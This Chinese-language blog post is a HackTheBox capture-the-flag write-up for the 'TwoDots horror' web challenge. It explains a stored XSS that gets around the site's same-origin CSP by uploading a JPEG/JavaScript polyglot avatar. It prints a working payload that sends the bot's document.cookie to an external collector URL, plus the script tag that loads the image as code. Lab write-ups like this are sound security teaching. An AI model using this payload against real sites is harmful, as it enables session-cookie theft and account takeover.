<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="懒"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>HackTheBox TwoDots horror WriteUP | 忘返</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><link rel="stylesheet" type="text/css" href="/plugins/highlight/atom-one-dark.min.css"><script type="text/javascript" src="/plugins/highlight/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();
</script><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">忘返</a></h1></div><p class="m-desc">正经人谁写日记啊。</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/links/">友链</a></li><li><span class="dot">●</span><a href="/Tips/">Tips</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">HackTheBox TwoDots horror WriteUP</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/">2023-09-07</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><blockquote>
<p>Everything starts from a dot and builds up to two. Uniting them is like a kiss in the dark from a stranger. Made up horrors to help you cope with the real ones, join us to take a bite at the two-sentence horror stories on our very own TwoDots Horror™ blog.</p>
</blockquote>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image.png" alt="challenge"></p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>首先我们梳理一下网站的功能，非常清晰：注册用户、用户登录、发表帖子、上传头像、用户登出。</p>
<p>接下来梳理代码。</p>
<p><code>flag</code>的位置在<code>/bot.js</code>中：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-1.png" alt="flag"></p>
<p>结合函数<code>purgeData(db)</code>，bot会主动访问网站的页面，那么我们最终大概率需要通过XSS来获取bot的cookie。</p>
<p>那么，我们来看<code>/review</code>的模板，关键代码如下：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image9.png" alt="safe"></p>
<blockquote>
<p><strong>safe</strong> 过滤器通常在各种模板引擎中用于标记一个字符串为”安全的”，这意味着该字符串不应该被转义。 ——ChatGPT</p>
</blockquote>
<p>那么，板上钉钉的，<code>&#123;&#123; post.content|safe &#125;&#125;</code>位置存在XSS漏洞。后续的思路，就是构造payload，写入这个位置，并且利用。</p>
<p>利用的难点在于，网站开启了CSP(内容安全策略，Content Security Policy)。</p>
<blockquote>
<p>CSP（内容安全策略，Content Security Policy）是一个安全特性，用于防止各种常见的跨站脚本攻击 (XSS) 和其他代码注入攻击。CSP 允许网站管理员指定哪些内容源（例如 JavaScript、CSS、图片等）是可信的，从而控制网页可以加载和执行哪些资源。<br>CSP 是通过 HTTP 响应头 Content-Security-Policy 或等效的 <meta> 元素在 HTML 中实现的。<br>————ChatGPT</p>
</blockquote>
<p>这里的策略限制了网站只加载同源的资源，所以我们无法加载外部的JS脚本：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-2.png" alt="CSP"></p>
<p>既然网站只能加载同源的JS脚本，那么我们就需要想办法将JS脚本上传到网站中。作为一个靶场，这个网站理论上不会有多余的功能，那么上传头像的功能我们理应可以利用的上。</p>
<p>多方查阅资料后，我们可以发现解决这个问题的骚操作：把JavaScript代码写入图片中：<a target="_blank" rel="noopener" href="https://github.com/s-3ntinel/imgjs_polygloter">https://github.com/s-3ntinel/imgjs_polygloter</a></p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><p>首先我们需要构造一个POC：</p>
<pre><code class="bash"># https://github.com/s-3ntinel/imgjs_polygloter
python3 img_polygloter.py jpg --height 666 --width 666 --payload &#39;window.location.href=&quot;http://rkfhc87j651n7m6f0va8pws5lwrnfc.oastify.com/grabber.php?c=&quot;+document.cookie;&#39; --output poc.jpg
</code></pre>
<p>然后注册用户，将POC上传到头像：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-3.png" alt="upload"></p>
<p><code>在/routes/index.js</code>中我们可以找到上传文件的访问路径：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-4.png" alt="avatar"></p>
<p>由此可以构造出XSS的POC(以用户名是admin为例)：</p>
<pre><code class="HTML">&lt;script charset=&quot;ISO-8859-1&quot; src=&quot;/api/avatar/admin&quot;&gt;&lt;/script&gt;123.123.
</code></pre>
<p>提交即可：</p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-5.png" alt="submit"></p>
<p><img src="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/image-6.png" alt="get-flag"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>这里需要注意的是payload的使用方式，需要设置<code>charset=&quot;ISO-8859-1&quot;</code>属性，否则的话JavaScript代码无法加载。</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs">Bypassing CSP using polyglot JPEGs</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/s-3ntinel/imgjs_polygloter">Image Polyglot</a></li>
<li><a target="_blank" rel="noopener" href="https://salucci.ch/2023/05/20/xss-with-a-jpg-jpeg-to-bypass-csp/">XSS with a JPG&#x2F;JPEG to bypass CSP</a></li>
</ul>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">忘返</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/">https://7mitu.github.io/2023/09/07/HackTheBox-TwoDots-horror-WriteUP/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="https://7mitu.github.io">忘返的博客</a>！</span></div></blockquote></div></article><div class="p-info box"><span class="p-tags"><i class="fa fa-tags"></i><a href="/tags/HackTheBox/">HackTheBox</a><a href="/tags/Web/">Web</a><a href="/tags/XSS/">XSS</a><a href="/tags/Bypass-CSP/">Bypass CSP</a></span></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">2.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">3.</span> <span class="toc-text">解题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-number">4.</span> <span class="toc-text">后记</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">5.</span> <span class="toc-text">参考资料</span></a></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="next" href="/2023/09/04/HackTheBox-breaking-grad-WriteUP/">HackTheBox breaking grad WriteUP &gt;</a></div></section><footer><p>Copyright © 2016 - 2023 <a href="/." rel="nofollow">忘返</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>